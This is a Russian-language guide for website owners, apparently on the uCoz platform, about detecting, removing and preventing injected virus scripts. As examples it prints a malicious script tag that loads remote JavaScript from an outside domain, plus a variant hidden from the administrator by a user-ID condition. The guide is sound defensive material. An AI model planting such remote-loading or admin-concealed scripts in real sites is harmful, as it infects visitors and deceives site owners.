Вирус на сайте негативно влияет на все факторы продвижения и монетизации сайта.
Во-первых, если у посетителя во время просмотра страниц «заругался» антивирус, то вполне вероятно, что он сразу же закроет зараженную страницу, и как следствие – увеличение показателя отказов от сайта.
Во-вторых, поисковая система, обнаружившая на сайте вредоносный код, обязательно пометит сайт в сниппете как потенциально опасный, а это потеря посещаемости как минимум в 5 раз.
В-третьих, вебмастер зараженного сайта не получит никакой прибыли с него в виду отсутствия посещаемости, а даже если она осталась – хорошие рекламодатели и партнерские программы вряд ли захотят с ним сотрудничать.
Как происходит заражение сайта вирусом?
Заражение сайта вирусом может проходить несколькими путями:
1.Зараженный компьютер получил ФТП доступ к сайту и внедрил в него вредоносный код. Это явление достаточно редкое и в случае, если ваш сайт «заразился» именно таким способом – сообщите об этом на официальном форуме системы uCoz, чтобы разработчики приняли меры по устранению «дыр» в системе безопасности сайтов.
2.Вебмастер установил рекламные блоки (например, тизерной партнерки), ссылки в которых числятся в базе антивирусов как потенциально опасные страницы.
3.Вебмастер скачал и установил на сайт зараженный скрипт, шаблон, вид модуля или другие участки шаблона добровольно. Это самая распространенная причина заражения сайта вирусом.
Не спешите писать на форум или в службу поддержки хостинга!
Сначала разберитесь с причинами появления вируса, а так же попытайтесь сами решить проблему без подключения к ней посторонних людей. Найти и удалить вирус не сложно!
Как найти вирус на сайте?
Чтобы самостоятельно обнаружить вирус на сайте – вы должны знать как он выглядит. В основном каждый вирус – это JS скрипт, который проводит подключение зараженного файла со стороннего сервера. А соответственно этот скрипт должен содержать в себе внешнюю ссылку.
Внимание! Смотрите на имена файлов JS и домены на которые они ссылаются! Читайте статью до конца перед тем, как приступать к активным действиям! Иначе рискуете испортить сайт!
Примерный вид вирусного скрипта будет таким:
<script type="text/javascript" src="http://bot1.gbk.ru/sript/script_site.js"></script>
Подобная конструкция может находиться в шаблонах вашего сайта в любых модулях и в любом участке шаблона, даже в составе других скриптов (например в коде Яндекс.Метрики), а также быть «спрятанным» от администратора условием с переменной $USER_ID$ (чтобы администратор не видел действия скрипта).
<?if($USER_ID$ == '4')?><?else?> <script type="text/javascript" src="http://bot1.gbk.ru/sript/script_site.js"></script><?endif?>
Злоумышленники специально прячут вредоносный код в «заковырные» места, чтобы усложнить администратору задачу по его поиску. Если вы более-менее умеете читать код шаблона, то обнаружить вирус не составит проблем (даже в «заковырном месте»).
Второй способ обнаружить вредоносный скрипт – это воспользоваться помощью антивирусных программ. Любой антивирус, посчитавший ваш сайт зараженным, выдаст специальное предупреждение, в котором будет полное описание зараженного файла. Скопировав имя этого файла, можно запросто найти его в коде шаблона той страницы, на которую «ругается» антивирус (Ctrl + F) и принять соответствующие меры.
Как предотвратить появление вирусов на сайте?
Чтобы не допустить заражения сайта вирусом советую воспользоваться несколькими рекомендациями:
1.Установите на компьютер антивирус.
2.Регулярно (раз в 1-2 месяца) проводите сканирование всех компьютеров, с которых вы заходили в панель управления сайта с помощью бесплатных антивирусных утилит (например, от Лаборатории Касперского).
3.Никогда не передавайте свои логины и пароли от сайта посторонним лицам.
4.Регулярно меняйте пароли (раз в 3-6 месяцев), но не запутайтесь в этом процессе, иначе сами не сможете попасть на свой же сайт.
5.Перед установкой любого скрипта или участка шаблона проверяйте наличие в них внешних ссылок. Все внешние ссылки нужно менять на свои (для этого приходится сначала скачивать по эти ссылкам файлы, а потом «перезаливать» на свой сайт).
6.Если ссылки в скрипте «нормальные» и ведут на рабочие и авторитетные сайты, то откройте по ссылке страницу с JS кодом, сохраните ее на своем компьютере с тем же именем, залейте этот файл в файловый менеджер вашего сайта (например, в папку с именем JS), и после этого подключите ссылку в скрипте уже ссылаясь на свой сайт, а не на посторонний. Тем самым вы гарантируете работоспособность скрипта в будущем, а так же обеспечиваете защиту сайта (в противном случае, админ стороннего ресурса может запросто заменить исходный рабочий скрипт зараженным, «залив» его в свой файловый менеджер под тем же именем).
Чтобы бороться с вирусами на сайте – нужно знать врага в лицо! Вирусы имеют разный вид и прячутся в самых непредсказуемых участках шаблона. Определить и ликвидировать вирус – достаточно просто, нужно всего лишь включить мозги и тщательно проанализировать каждую страницу своего сайта на наличие JavaScript скриптов с заключенными в них внешними ссылками.
Как правило, вирусы не имеют нормального «человеческого» имени, а представляют нелепый набор латинских букв и цифр типа «jxiot1.js». Сайты, на которых они лежат, являются субдоменами основного и уже нерабочего сайта, и так же содержат подозрительные доменные имена, например bot3.gfdx.net и т.д. Если вы встретили подобные имена в скриптах, будьте уверены – это вирусняк!